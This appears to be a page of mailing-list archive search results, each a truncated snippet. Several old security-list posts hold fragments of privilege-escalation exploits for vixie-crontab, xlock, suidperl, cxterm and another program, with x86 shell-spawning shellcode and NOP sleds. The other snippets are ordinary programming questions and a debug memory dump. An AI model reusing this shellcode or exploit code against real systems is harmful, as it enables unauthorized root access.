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1996 Dec 15
0
vixie-crontab for redhat linux
...X_TEMPSTR is 100 */
#define HAPPY_FILE "./Window"
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char **argv)
{
int fd;
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
/*
* The sscanf line reads for ''name'' as %[^ =]. Neither a space, nor...
1997 Apr 27
0
Overflow in xlock (fwd)
...50
#define BUFFER_SIZE 996
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
int main(int argc, char *argv[])
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int dfltOFFSET = DEFAULT_OFFSET;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;...
1997 Nov 13
0
another buffer overrun in sperl5.003
...exploit code]
#!/usr/bin/perl
# yes, this suidperl exploit is in perl, isn''t it wonderful? :)
$| = 1;
$shellcode =
"\x90" x 512 . # nops
"\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp
# "standard shellcode" by Aleph One
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;
# tr...
2018 Feb 06
0
"make check" test-hash-method bus error (Sparc alignment)
...size_t olen;
63 } test_vectors[] =
64 {
...
115 { "sha1",
116 "",
117 0,
118 1,
119 "\xda\x39\xa3\xee\x5e\x6b\x4b\x0d"
120 "\x32\x55\xbf\xef\x95\x60\x18\x90"
121 "\xaf\xd8\x07\x09",
122 160 / 8
123 },
...
etc.
The input data needs to be 8 byte aligned but is just a void...
2009 Apr 01
1
Latex symbols in R (\perp and \parallel)
Dear All,
I am sure this is a one-liner, but I cannot find the R command to
generate the LaTex symbols \perp and \parallel. Consider for instance
the figure
(one can use any kind of data for the plot)
pdf("friction_linear_chain_perpendicular.pdf")
par( mar = c(4.5,5, 2, 1) + 0.1)
plot(data[ ,1], data[
1997 May 14
4
cxterm buffer overrun
...t
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define CXTERM_PATH "/usr/X11R6/bin/cxterm"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
char...
1997 Sep 26
3
Forwarded mail....
...r >1100) and a offset ( 1500<off >2500)
mail me at admsmb@hotmail.com if u wanna some help */
#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdlib.h>
#include <strings.h>
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax...
2008 Dec 10
2
Possible (bug) in winamp in_flac.dll decoder
.........
01a6fe58 64 fe a6 01 7c 4b a7 01 - b8 fe a6 01 8c ff a6 01 d...|K..........
01a6fe68 7c 4b a7 01 b8 fe a6 01 - 00 00 00 00 64 67 9e 00 |K..........dg..
01a6fe78 02 00 00 00 0f b8 fb 3b - 3e 70 c5 3c 05 cf b4 bd .......;>p.<....
01a6fe88 58 35 65 bd 23 9b 03 3c - 02 00 00 00 02 00 00 00 X5e.#..<........
01a6fe98 98 21 0e bd a5 14 6b bd - 40 92 d4 01 00 00 00 00 .!....k. at .......
01a6fea8 ee 8e 8b bd 02 00 00 00 - 00 b5 94 bc 00 00 00 00 ................
01a6feb8 34 ff a6 01 bd 22 41 00 - fc 22 c7 01 64 67 9e 00 4...."A.."..dg..
01a6fec8 00 00 00 00 10 00 00 00 - 02 00 0...